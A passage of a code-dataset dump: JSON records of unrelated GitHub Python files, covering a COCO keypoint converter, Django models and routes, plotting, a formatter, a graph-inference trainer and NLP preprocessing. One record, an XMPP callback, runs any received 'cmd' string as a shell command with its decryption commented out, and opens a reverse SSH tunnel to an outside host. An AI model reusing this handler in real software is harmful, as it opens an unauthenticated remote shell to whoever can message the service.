parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n if int(p[\"y\"]) > y_max:\n y_max = int(p[\"y\"])\n if y_max > img_height: \n y_max + img_height\n parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n ann_width = x_max-x_min\n ann_height = y_max-y_min\n keypoints = [\n parts[\"left_eye\"],\n parts[\"right_eye\"],\n parts[\"left_ear\"],\n parts[\"right_ear\"],\n parts[\"nose\"],\n parts[\"throat\"],\n parts[\"tailbase\"],\n parts[\"withers\"],\n parts[\"front_left_elbow\"],\n parts[\"front_right_elbow\"],\n parts[\"rear_left_elbow\"],\n parts[\"rear_right_elbow\"],\n parts[\"front_left_knee\"],\n parts[\"front_right_knee\"],\n parts[\"rear_left_knee\"],\n parts[\"rear_right_knee\"],\n parts[\"front_left_paw\"],\n parts[\"front_right_paw\"],\n parts[\"rear_left_paw\"],\n parts[\"rear_right_paw\"],\n ]\n datas = {\n \"keypoints\": [float(item) for sub_list in keypoints for item in sub_list],\n \"image_id\": i,\n \"id\": e[\"instance_id\"][\"value\"],\n \"num_keypoints\": 20,\n \"bbox\": [float(x_min), float(y_min), float(ann_width), float(ann_height)],\n \"iscrowd\": 0,\n \"area\": float(ann_width * ann_height),\n \"category_id\": 1,\n \"x_min\": x_min,\n \"x_max\": x_max,\n \"y_min\": y_min,\n \"y_max\": y_max,\n \"width\": ann_width,\n \"height\": ann_height,\n \"points\": keypoints,\n }\n annotations.append(datas)\n\n\n categories = { \n \"supercategory\": \"animal\",\n \"id\": 1,\n \"name\": \"cow\",\n \"keypoints\": [ \"L_Eye\", \"R_Eye\", \"L_EarBase\", \"R_EarBase\", \"Nose\", \"Throat\", \"TailBase\", \"Withers\", \"L_F_Elbow\", \"R_F_Elbow\", \"L_B_Elbow\", \"R_B_Elbow\", \"L_F_Knee\", \"R_F_Knee\", \"L_B_Knee\", \"R_B_Knee\", \"L_F_Paw\", \"R_F_Paw\", \"L_B_Paw\", \"R_B_Paw\"],\n \"skeleton\": [[1, 2], [1, 3], [2, 4], [1, 5], [2, 5], [5, 6], [6, 8], [7, 8], [6, 9], [9, 13], [13, 17], [6, 10], [10, 14], [14, 18], [7, 11], [11, 15], [15, 19], [7, 12], [12, 16], [16, 20]]\n }\n\n info = {\n \"version\": \"1.0\",\n \"data_path\": impath,\n \"date_created\": str(datetime.datetime.now()),\n \"dataset_size\": len(coll[\"images\"])\n }\n\n all = {\"info\": info, \"images\": images, \"annotations\": annotations, \"categories\": [categories]}\n json_object = json.dumps(all, indent = 4) \n name = json_file+coll[\"name\"]\n with open(name, 'w') as f:\n f.write(json_object)\n","repo_name":"bresilla/coco_visualiser","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2373702211","text":"from django.db import models\n\nfrom common.models import BaseModel\nfrom vehicles.models.vehicle import Vehicle\n\n\nclass VehicleImage(BaseModel):\n vehicle = models.ManyToManyField(\n Vehicle,\n blank=True,\n related_name='images',\n verbose_name=\"ТС\"\n )\n image = models.ImageField(upload_to='images/vehicles/', verbose_name=\"Фото\")\n\n class Meta:\n verbose_name = \"Фотография\"\n verbose_name_plural = \"Фотографии\"\n\n\nclass VehicleFile(BaseModel):\n vehicle = models.ManyToManyField(\n Vehicle,\n blank=True,\n related_name='files',\n verbose_name=\"ТС\"\n )\n file = models.FileField(upload_to='files/vehicles/', verbose_name=\"Файл\")\n\n class Meta:\n verbose_name = \"Файл\"\n verbose_name_plural = \"Файлы\"\n","repo_name":"redbird504/fms_backend","sub_path":"src/vehicles/models/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"15492068252","text":"import pandas as pd\nimport plotly.graph_objects as go\nimport plotly\n\n# read data\ndf = pd.read_csv('/Users/tomgurrie/sankey_austin.csv')\n\n# convert to dictionary\ndata = df[['source','target','value']].to_dict(orient=\"list\")\n\n# create plot\nfig = go.Figure(data=[go.Sankey(\n node = dict(\n pad = 15,\n thickness = 20,\n line = dict(color = \"black\", width = 0.5),\n label = [\"Aus-E\", \"Aus-W\", \"Both\", \"New\", \"Aus-E\", \"Aus-W\", \"Both\", \"Lapsed\"],\n color = \"blue\"\n ),\n link = data\n )])\n\nfig.update_layout(title_text=\"Basic Sankey Diagram\", font_size=10)\n\nplotly.offline.plot(fig, filename='sankey_austin.html')\n\n","repo_name":"Redledbetter08/Projects","sub_path":"sankey_austin/sankey_diagram.py","file_name":"sankey_diagram.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"362865168","text":"from callback import Callback\nfrom pycrypt import decode_crypt \nimport commands\nimport logging\nimport os\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\nimport binascii\n\nclass Cmd(Callback):\n def __init__(self):\n self.log = logging.getLogger(\"cement:app:xmpp\")\n self.log.debug('Cmd class creat object !', extra={'namespace' : 'xmpp'})\n\n def run(self, args = None):\n self.log.debug('args:%s'%args.items(), extra={'namespace' : 'xmpp'})\n cmd = args.get('cmd', 'not found')\n self.log.debug('cmd:%s '%cmd, extra={'namespace' : 'xmpp'})\n if cmd != 'not found':\n #cmd_decoded = self.decode_crypt(cmd)\n #text = binascii.a2b_hex(data)\n #text = binascii.a2b_hex(cmd)\n #self.log.debug('cmd text:%s '%text, extra={'namespace' : 'xmpp'})\n #cmd_decoded = decode_crypt(text)\n cmd_decoded = cmd\n self.log.debug('cmd decoded :%s '%cmd_decoded, extra={'namespace' : 'xmpp'})\n (status, output) = commands.getstatusoutput(cmd_decoded)\n self.log.debug('[status]:%s [output]:%s'%(status, output), extra={'namespace' : 'xmpp'})\n if status != 0:\n result = 'cmd execute error!'\n else :\n result = output\n return result \n\n def ssh_bind(self, args = None):\n \"\"\"\n ssh -R sourcePort:forwardToHost:onPort connectToHost\n \"\"\"\n self.log.debug('args:%s'%args.items(), extra={'namespace' : 'xmpp'})\n \n source_port = args.get('source_port', '22')\n on_port = args.get('on_port', '9090')\n connect_to_host = args.get('connect_to_host', 'ibox@www.pinet.cc')\n #path = '/usr/local/src/RestXMPP/bin/'\n path = '/home/spirit/work/git_test/RestXMPP/bin'\n cmd = 'cd %s ; sh ssh_xmpp %s %s %s '%(path, on_port, source_port, connect_to_host) \n self.log.debug('cmd:%s '%cmd, extra={'namespace' : 'xmpp'})\n os.system(cmd)\n result = 'OK SSH Tunnel'\n return result \n \"\"\"\n def decode_crypt(self,str_src):\n\n self.log.debug('enter decode ', extra={'namespace' : 'xmpp'})\n home = os.path.expanduser('~')\n self.log.debug('home:%s'%home, extra={'namespace' : 'xmpp'})\n f = open('%s/.ssh/id_rsa'%(home),'r')\n self.log.debug('f:%s'%f, extra={'namespace' : 'xmpp'})\n r = f.read()\n key = RSA.importKey(r)\n self.log.debug('key:%s'%key, extra={'namespace' : 'xmpp'})\n #if key.has_private(): print \"Private key\"\n s1 = key.decrypt(str_src) \n print '-' * 30\n print s1\n return s1\n \"\"\"\n \"\"\"\n def decode_crypt(str_src):\n home = os.path.expanduser('~')\n f = open('%s/.ssh/id_rsa'%(home),'r')\n r = f.read()\n print r\n key = RSA.importKey(r)\n #if key.has_private(): print \"Private key\"\n s1 = key.decrypt(str_src) \n return s1\n 
\"\"\"\n","repo_name":"spartacus429496/restxmpp_backup","sub_path":"callbacks/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38509464821","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('',home,name='home'),\n path('productlist/',productList,name='productList'),\n path('productdetail//',productDetail,name='productDetail'),\n path('productcreate/',productCreate,name='productCreate'),\n path('productupdate//',productUpdate,name='productUpdate'),\n path('productdelete//',productDelete,name='productDelete'),\n]\n","repo_name":"sachinspeaks/DRF-api","sub_path":"core/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20439056261","text":"# import os\n# import shutil \n# imgs_path = \"../img\"\n# segs_path = \"../mask1\"\n# train_path = \"../dataset_30000/train\"\n# val_path = \"../dataset_30000/val\"\n# test_path = \"../dataset_30000/test\"\n# for ia in range(18000):\n# shutil.copyfile(f'{imgs_path}/{ia}.jpg',f\"{train_path}/{ia}.jpg\")\n# for ia in range(18000,21000):\n# shutil.copyfile(f'{imgs_path}/{ia}.jpg',f\"{train_path}/{ia}.jpg\")\n# for ia in range(21000,30000):\n# shutil.copyfile(f'{imgs_path}/{ia}.jpg',f\"{test_path}/{ia}.jpg\")\n\n\nfrom keras_segmentation.data_utils.data_loader import *\nfrom keras_segmentation.data_utils.visualize_dataset import *\n\nimg_path = \"dataset1/train\"\nano_img_path = \"dataset1/ano_train\"\n# img_path = \"dataset1/test\"\n# ano_img_path = \"dataset1/ano_test\"\nimg_path = \"dataset1/val\"\nano_img_path = \"dataset1/ano_val\"\nimg_path = \"demo/test\"\nano_img_path = \"demo/ano_test\"\n# verify_segmentation_dataset(img_path,ano_img_path,12,False,False)\n\n# \n# visuallize\nvisualize_segmentation_dataset(images_path=img_path,segs_path=ano_img_path,n_classes=12,no_show=False)\n# for seg_img, seg_path in visualize_segmentation_dataset(images_path=img_path,segs_path=ano_img_path,n_classes=12,no_show=True):\n# \tcv2.imwrite(f\"demo/ano_colors/{seg_path.split('/')[-1]}\", seg_img)\n\n\"\"\"\n0:sky\n1:building\n2:pole #cột đèn\n3:road\n4:sidewalk\n5:vegetation\n6:traffic light\n7:fence\n8:car\n9:person\n10:rider\n11:static\n\"\"\"","repo_name":"quyvsquy/demoUnet_Segnet_FCN_PSPnet_","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18497206959","text":"\ndef arithmetic_arranger(list, x = False):\n if len(list) > 5 : return ('Error: Too many problems.')\n \n new_list = []\n for item in list:\n if '*' in item or '/' in item:\n return (\"Error: Operator must be '+' or '-'.\")\n new_list.append(item.split())\n \n for i in new_list:\n if not i[0].isdigit() or not i[2].isdigit():\n return ('Error: Numbers must only contain digits.')\n if len(i[0]) > 5 or len(i[2]) > 5: \n return ('Error: Numbers cannot be more than four digits.')\n \n if i[1] == '+':\n result = int(i[0]) + int(i[2])\n i.append(str(result))\n else:\n result = int(i[0]) - int(i[2])\n i.append(str(result))\n \n list_one = []\n list_two = []\n list_three = []\n list_four = [] \n\n for item in new_list:\n if len(item[0]) < len(item[2]):\n space = ' ' * (len(item[2]) - len(item[0]))\n list_one.append(' ' + space + item[0])\n 
list_two.append(item[1] + ' ' + item[2])\n list_three.append('-' * len(item[1] + ' ' + item[2]))\n if len(item[3]) == len(item[2]):\n list_four.append( ' ' + item[3])\n elif len(item[3]) > len(item[2]):\n list_four.append( ' ' + item[3])\n else:\n list_four.append( ' ' + item[3])\n else: \n space = ' ' * (len(item[0]) - len(item[2]))\n list_one.append(' ' + item[0])\n list_two.append(item[1] + ' ' + space + item[2])\n list_three.append('-' * len(item[1] + ' ' + item[0]))\n trick = ' ' * (len(item[0]) - len(item[3]))\n list_four.append(' ' + trick + item[3])\n if x:\n return (' '.join(list_one) + '\\n' + ' '.join(list_two) + '\\n' + ' '.join(list_three) + '\\n' + ' '.join(list_four))\n else:\n return (' '.join(list_one) + '\\n' + ' '.join(list_two) + '\\n' + ' '.join(list_three))\n \n\n\nprint(arithmetic_arranger([\"10901 - 10\", \"40 - 100\", \"40 - 405\", \"3 + 409\"], x = False))\n","repo_name":"pierrebomfim/freecodecamp-projects","sub_path":"arithmetic-formatter.py","file_name":"arithmetic-formatter.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16336876206","text":"from django.urls import path\n\nfrom gain_knowledge.main.views import CategoryListView, CourseDetailView, display_question, final_score, \\\n HomeView, CoursesListView, TestsListView, CreateCourseView, UserCoursesListView, CourseEditView, CourseDeleteView, \\\n UserTestsListView, CreateTestView, EditTestView, DeleteTestView, UserQuestionsListView, CreateQuestionView, \\\n DeleteQuestionView, EditQuestionView, QuestionDetailView\n\nurlpatterns = [\n path('', HomeView.as_view(), name='index'),\n path('categories/', CategoryListView.as_view(), name='list categories'),\n path('categories/', CoursesListView.as_view(), name='list courses'),\n path('course/', CourseDetailView.as_view(), name='courses details'),\n path('tests/', TestsListView.as_view(), name='list tests'),\n path('question//', display_question, name='display question'),\n path('final_score/', final_score, name='final score'),\n path('create_course/', CreateCourseView.as_view(), name='create course'),\n path('user_courses/', UserCoursesListView.as_view(), name='user list courses'),\n path('edit_course/', CourseEditView.as_view(), name='edit course'),\n path('delete_course/', CourseDeleteView.as_view(), name='delete course'),\n path('user_tests/', UserTestsListView.as_view(), name='user list tests'),\n path('create_test/', CreateTestView.as_view(), name='create test'),\n path('edit_test/', EditTestView.as_view(), name='edit test'),\n path('delete_test/', DeleteTestView.as_view(), name='delete test'),\n path('user_questions/', UserQuestionsListView.as_view(), name='user list questions'),\n path('create_question/', CreateQuestionView.as_view(), name='create question'),\n path('delete_question/', DeleteQuestionView.as_view(), name='delete question'),\n path('edit_question/', EditQuestionView.as_view(), name='edit question'),\n path('show_question/', QuestionDetailView.as_view(), name='show question'),\n]","repo_name":"nikozhuharov/gain_knowledge","sub_path":"gain_knowledge/gain_knowledge/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2223236890","text":"import torch\nfrom torch import Tensor\nimport config as cfg\nfrom torch.nn.functional import mse_loss, one_hot\nfrom instructors.base import Instructor\nimport numpy as 
np\nfrom torch.utils.data.dataset import TensorDataset\nfrom torch import optim\nfrom utils.metric import nll_gaussian\nfrom torch.optim.lr_scheduler import StepLR\n\n\nclass XNRIDECIns(Instructor):\n \"\"\"\n Train the decoder given the ground truth relations.\n \"\"\"\n def __init__(self, model: torch.nn.DataParallel, data: dict, es: np.ndarray, cmd):\n \"\"\"\n Args:\n model: an auto-encoder\n data: train / val /test set\n es: edge list\n cmd: command line parameters\n \"\"\"\n super(XNRIDECIns, self).__init__(cmd)\n self.model = model\n self.data = {key: TensorDataset(value[0], value[1])\n for key, value in data.items()}\n self.es = torch.LongTensor(es)\n # number of nodes\n self.size = cmd.size\n self.batch_size = cmd.batch\n # optimizer\n self.opt = optim.Adam(self.model.parameters(), lr=cfg.lr)\n # learning rate scheduler, same as in NRI\n self.scheduler = StepLR(self.opt, step_size=cfg.lr_decay, gamma=cfg.gamma)\n\n def train(self):\n # use the loss as the metric for model selection, default: +\\infty\n val_best = np.inf\n # path to save the current best model\n prefix = '/'.join(cfg.log.split('/')[:-1])\n name = '{}/best.pth'.format(prefix)\n for epoch in range(1, 1 + self.cmd.epochs):\n self.model.train()\n # shuffle the data at each epoch\n data = self.load_data(self.data['train'], self.batch_size)\n loss_a = 0.\n N = 0.\n for adj, states in data:\n if cfg.gpu:\n adj = adj.cuda()\n states = states.cuda()\n scale = len(states) / self.batch_size\n # N: number of samples, equal to the batch size with possible exception for the last batch\n N += scale\n loss_a += scale * self.train_nri(states, adj)\n loss_a /= N \n self.log.info('epoch {:03d} loss {:.3e}'.format(epoch, loss_a))\n losses = self.report('val', [cfg.M])\n\n val_cur = losses[0]\n if val_cur < val_best:\n # update the current best model when approaching a lower loss\n val_best = val_cur\n torch.save(self.model.module.state_dict(), name)\n\n # learning rate scheduling\n self.scheduler.step()\n if self.cmd.epochs > 0:\n self.model.module.load_state_dict(torch.load(name))\n _ = self.test('test', 20)\n\n def report(self, name: str, Ms: list) -> list:\n \"\"\"\n Evaluate the mean squared errors.\n\n Args:\n name: 'train' / 'val' / 'test'\n Ms: [...], each element is a number of steps to predict\n \n Return:\n mses: [...], mean squared errors over all steps\n \"\"\"\n mses = []\n for M in Ms:\n mse, ratio = self.evaluate(self.data[name], M)\n mses.append(mse)\n self.log.info('{} M {:02d} mse {:.3e} ratio {:.4f}'.format(\n name, M, mse, ratio))\n return mses\n\n def train_nri(self, states: Tensor, adj: Tensor) -> Tensor:\n \"\"\"\n Args:\n states: [batch, step, node, dim], observed node states\n adj: [batch, E, K], ground truth interacting relations\n\n Return:\n loss: reconstruction loss\n \"\"\"\n output = self.model.module.predict_states(states, one_hot(adj.transpose(0, 1)).float(), cfg.M)\n loss = nll_gaussian(output, states[:, 1:], 5e-5)\n self.optimize(self.opt, loss * cfg.scale)\n return loss\n\n def evaluate(self, test, M: int):\n \"\"\"\n Evaluate related metrics to monitor the training process.\n\n Args:\n test: data set to be evaluted\n M: number of steps to predict\n\n Return: \n mse: mean square error over all steps\n ratio: relative root mean squared error\n \"\"\"\n mse, ratio = [], []\n data = self.load_data(test, self.batch_size)\n N = 0.\n with torch.no_grad():\n for adj, states in data:\n if cfg.gpu:\n adj = adj.cuda()\n states = states.cuda()\n states_dec = states[:, -cfg.train_steps:, :, :]\n target = 
states_dec[:, 1:]\n \n output = self.model.module.predict_states(states_dec, one_hot(adj.transpose(0, 1)).float(), M)\n # scale all metrics to match the batch size\n scale = len(states) / self.batch_size\n N += scale\n\n mse.append(scale * mse_loss(output, target).data)\n ratio.append(scale * (((output - target) ** 2).sum(-1).sqrt() / (target ** 2).sum(-1).sqrt()).mean())\n mse = sum(mse) / N\n ratio = sum(ratio) / N\n return mse, ratio\n\n def test(self, name: str, M: int):\n \"\"\"\n Evaluate related metrics to measure the model performance.\n The biggest difference between this function and evalute() is that, the mses are evaluated at each step.\n\n Args:\n name: 'train' / 'val' / 'test'\n M: number of steps to predict\n\n Return:\n mse_multi: mse at each step\n \"\"\"\n \"\"\"\n mses: mean square error over all steps\n ratio: relative root mean squared error\n mse_multi: mse at each step\n \"\"\"\n mse_multi, mses, ratio = [], [], []\n data = self.load_data(self.data[name], self.batch_size)\n N = 0.\n with torch.no_grad():\n for adj, states in data:\n if cfg.gpu:\n adj = adj.cuda()\n states = states.cuda()\n states_dec = states[:, -cfg.train_steps:, :, :]\n target = states_dec[:, 1:]\n \n output = self.model.module.predict_states(states_dec, one_hot(adj.transpose(0, 1)).float(), cfg.M)\n # scale all metrics to match the batch size\n scale = len(states) / self.batch_size\n N += scale\n\n mses.append(scale * mse_loss(output, target).data)\n ratio.append(scale * (((output - target) ** 2).sum(-1).sqrt() / (target ** 2).sum(-1).sqrt()).mean())\n\n states_dec = states[:, cfg.train_steps:cfg.train_steps+M+1, :, :]\n target = states_dec[:, 1:]\n \n output = self.model.module.predict_states(states_dec, one_hot(adj.transpose(0, 1)).float(), M)\n mse = ((output - target) ** 2).mean(dim=(0, 2, -1))\n mse *= scale\n mse_multi.append(mse)\n mses = sum(mses) / N\n mse_multi = sum(mse_multi) / N\n ratio = sum(ratio) / N\n self.log.info('{} M {:02d} mse {:.3e} ratio {:.4f}'.format(\n name, M, mses, ratio,))\n msteps = ','.join(['{:.3e}'.format(i) for i in mse_multi])\n self.log.info(msteps)\n return mse_multi\n","repo_name":"hilbert9221/NRI-MPM","sub_path":"instructors/XNRI_dec.py","file_name":"XNRI_dec.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"21126945756","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef func(x):\n # 直接返回函数\n return np.exp(-x*x/(2*155.2*155.2))\n\n\ndef plot_func():\n # param:起点,终点,间距\n x = np.arange(0, 1552//2, 0.01)\n y = func(x)\n plt.plot(x, y)\n plt.show()\n\n\nif __name__ == '__main__':\n plot_func()\n","repo_name":"Sherhang/MyStudy","sub_path":"Python/PythonCodeInTest/函数图像测试/one_dimension.py","file_name":"one_dimension.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13319129122","text":"import discord\nfrom discord.ext import commands\n\nfrom functions import send_message # pylint: disable=import-error\n\n\nclass Users(commands.Cog):\n \"\"\"\n Commands related to Users.\n \"\"\"\n def __init__(self, client):\n self.client = client\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.command(brief=\"Send avatar picture of an user.\",\n aliases=[\"uavatar\"])\n async def useravatar(self, ctx, member: discord.Member = None):\n \"\"\"\n Send avatar picture of a specified user.\n \"\"\"\n member = member if member is not None else 
ctx.message.author\n        await send_message(ctx, member.avatar_url)\n\n    @commands.cooldown(1, 3, commands.BucketType.user)\n    @commands.has_permissions(kick_members=True)\n    @commands.bot_has_permissions(kick_members=True)\n    @commands.command(brief=\"Kick a user.\")\n    async def kick(self, ctx, member: discord.Member, *, reason=None):\n        \"\"\"\n        Kick a user.\n        \"\"\"\n        try:\n            await member.kick(reason=reason)\n        except discord.errors.Forbidden:\n            await send_message(ctx, \"That user is too powerful...\")\n        else:\n            await send_message(ctx, f\"Kicked {member.mention}.\")\n\n    @commands.cooldown(1, 3, commands.BucketType.user)\n    @commands.has_permissions(ban_members=True)\n    @commands.bot_has_permissions(ban_members=True)\n    @commands.command(brief=\"Ban a user.\")\n    async def ban(self, ctx, member: discord.Member, *, reason=None):\n        \"\"\"\n        Ban a user.\n        \"\"\"\n        try:\n            await member.ban(reason=reason)\n        except discord.errors.Forbidden:\n            await send_message(ctx, \"That user is too powerful...\")\n        else:\n            await send_message(ctx, f\"Banned {member.mention}.\")\n\n    @commands.cooldown(1, 3, commands.BucketType.user)\n    @commands.has_permissions(ban_members=True)\n    @commands.bot_has_permissions(ban_members=True)\n    @commands.command(brief=\"Unban a user.\")\n    async def unban(self, ctx, *, member):\n        \"\"\"\n        Unban a user.\n        Use the format username#discriminator\n        \"\"\"\n        banned_users = await ctx.guild.bans()\n\n        try:\n            member_name, member_disc = member.split('#')\n        except ValueError:\n            await send_message(ctx, \"Invalid format! \"\n                                    \"Make sure to include \"\n                                    \"the user's discriminator: User#0000\")\n            return\n        else:\n            for bans in banned_users:\n                if (bans.user.name, bans.user.discriminator) == \\\n                        (member_name, member_disc):\n                    await ctx.guild.unban(bans.user)\n                    await send_message(ctx, f\"Unbanned {bans.user.mention}.\")\n                    return\n\n        await send_message(ctx, \"User not found. 
Make sure to \"\n \"differentiate capital letters.\")\n\n @commands.cooldown(1, 5, commands.BucketType.user)\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n @commands.command(brief=\"List of all banned users and reason for the ban.\",\n aliases=[\"bl\"])\n async def banlist(self, ctx):\n \"\"\"\n List of all banned users and reason for the ban, if there's one.\n \"\"\"\n banned_users = await ctx.guild.bans()\n message = \"\"\n\n if len(banned_users):\n message = (f\"{person.user.mention} - \"\n f\"{person.user.name}#{person.user.discriminator}\\n\"\n f\"Reason: {person.reason}\" for person in banned_users)\n\n await send_message(ctx, \"\\n\".join(message))\n else:\n await send_message(ctx, \"No banned users in this server!\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(mute_members=True)\n @commands.bot_has_guild_permissions(mute_members=True)\n @commands.command(brief=\"Mute an user.\")\n async def mute(self, ctx, member: discord.Member):\n \"\"\"\n Mute an user microphone.\n \"\"\"\n try:\n await member.edit(mute=True)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Muted {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(mute_members=True)\n @commands.bot_has_guild_permissions(mute_members=True)\n @commands.command(brief=\"Unmute an user.\")\n async def unmute(self, ctx, member: discord.Member):\n \"\"\"\n Unmute an user microhphone.\n \"\"\"\n try:\n await member.edit(mute=False)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Unmuted {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(deafen_members=True)\n @commands.bot_has_guild_permissions(deafen_members=True)\n @commands.command(brief=\"Deafen an user.\")\n async def deafen(self, ctx, member: discord.Member):\n \"\"\"\n Deafen an user audio.\n \"\"\"\n try:\n await member.edit(deafen=True)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Deafened {member.mention}.\")\n\n @commands.cooldown(1, 3, commands.BucketType.user)\n @commands.has_guild_permissions(deafen_members=True)\n @commands.bot_has_guild_permissions(deafen_members=True)\n @commands.command(brief=\"Undeafen an user.\")\n async def undeafen(self, ctx, member: discord.Member):\n \"\"\"\n Undeafen an user audio.\n \"\"\"\n try:\n await member.edit(deafen=False)\n except discord.HTTPException:\n await send_message(ctx, \"Member not connected to any voice chat.\")\n else:\n await send_message(ctx, f\"Undeafened {member.mention}.\")\n\n @kick.error\n @ban.error\n @mute.error\n @unmute.error\n @deafen.error\n @undeafen.error\n async def member_error(self, ctx, error):\n \"\"\"\n Checks if member exists.\n \"\"\"\n if isinstance(error, commands.BadArgument):\n await send_message(ctx, \"Unknown user.\")\n\n\ndef setup(client):\n \"\"\"\n Setup the Cog.\n \"\"\"\n client.add_cog(Users(client))\n","repo_name":"victorborneo/SatenBot","sub_path":"cogs/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":6547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36674607756","text":"import typing\n\nfrom PySide6 import 
QtWidgets\n\nfrom randovania.game_description.game_description import GameDescription\nfrom randovania.games.prime1.layout.prime_configuration import LayoutCutsceneMode\nfrom randovania.gui.generated.preset_prime_qol_ui import Ui_PresetPrimeQol\nfrom randovania.gui.lib import signal_handling\nfrom randovania.gui.lib.window_manager import WindowManager\nfrom randovania.gui.preset_settings.preset_tab import PresetTab\nfrom randovania.interface_common.preset_editor import PresetEditor\nfrom randovania.layout.preset import Preset\n\n_FIELDS = [\n \"warp_to_start\",\n \"main_plaza_door\",\n \"blue_save_doors\",\n \"backwards_frigate\",\n \"backwards_labs\",\n \"backwards_upper_mines\",\n \"backwards_lower_mines\",\n \"phazon_elite_without_dynamo\",\n \"spring_ball\",\n]\n\nclass PresetPrimeQol(PresetTab, Ui_PresetPrimeQol):\n def __init__(self, editor: PresetEditor, game_description: GameDescription, window_manager: WindowManager):\n super().__init__(editor, game_description, window_manager)\n self.setupUi(self)\n\n self.description_label.setText(self.description_label.text().replace(\"color:#0000ff;\", \"\"))\n\n # Signals\n self.cutscene_combo.setItemData(0, LayoutCutsceneMode.ORIGINAL)\n self.cutscene_combo.setItemData(1, LayoutCutsceneMode.COMPETITIVE)\n self.cutscene_combo.setItemData(2, LayoutCutsceneMode.MINOR)\n self.cutscene_combo.setItemData(3, LayoutCutsceneMode.MAJOR)\n signal_handling.on_combo(self.cutscene_combo, self._on_cutscene_changed)\n for f in _FIELDS:\n self._add_persist_option(getattr(self, f\"{f}_check\"), f)\n\n @classmethod\n def tab_title(cls) -> str:\n return \"Quality of Life\"\n\n @classmethod\n def uses_patches_tab(cls) -> bool:\n return True\n\n def _add_persist_option(self, check: QtWidgets.QCheckBox, attribute_name: str):\n def persist(value: bool):\n with self._editor as editor:\n editor.set_configuration_field(attribute_name, value)\n\n signal_handling.on_checked(check, persist)\n\n def _on_cutscene_changed(self, value: LayoutCutsceneMode):\n with self._editor as editor:\n editor.set_configuration_field(\"qol_cutscenes\", value)\n\n def on_preset_changed(self, preset: Preset):\n config = preset.configuration\n for f in _FIELDS:\n typing.cast(QtWidgets.QCheckBox, getattr(self, f\"{f}_check\")).setChecked(getattr(config, f))\n signal_handling.set_combo_with_value(self.cutscene_combo, config.qol_cutscenes)\n","repo_name":"HighC914/randovania","sub_path":"randovania/games/prime1/gui/preset_settings/prime_patches_qol.py","file_name":"prime_patches_qol.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"8266905790","text":"import os\nimport jieba\nimport time\nimport codecs\n\nfrom tensorflow.keras.utils import to_categorical\n\nfrom src.utils.utils import read_file, ensure_dir, save_pkl, load_pkl, get_time_idf\nfrom src.utils.config import config\nfrom src.utils.Enconde import TextEnconde\n\n\ndef build_vocab(texts, out_path):\n vocab = TextEnconde()\n for text in texts:\n vocab.add_sentences(text)\n vocab.trim(config.min_freq)\n\n ensure_dir(out_path)\n\n vocab_path = os.path.join(out_path, 'vocab.pkl')\n vocab_txt = os.path.join(out_path, 'vocab.txt')\n\n save_pkl(vocab_path, vocab, 'vocab')\n\n with codecs.open(vocab_txt, 'w', encoding='utf-8') as f:\n f.write(os.linesep.join([word for word in vocab.word2id.keys()]))\n\n return vocab, vocab_txt\n\n\ndef get_data(datas):\n entity_ones, entity_twos = [], []\n texts, relations = [], []\n pos = []\n 
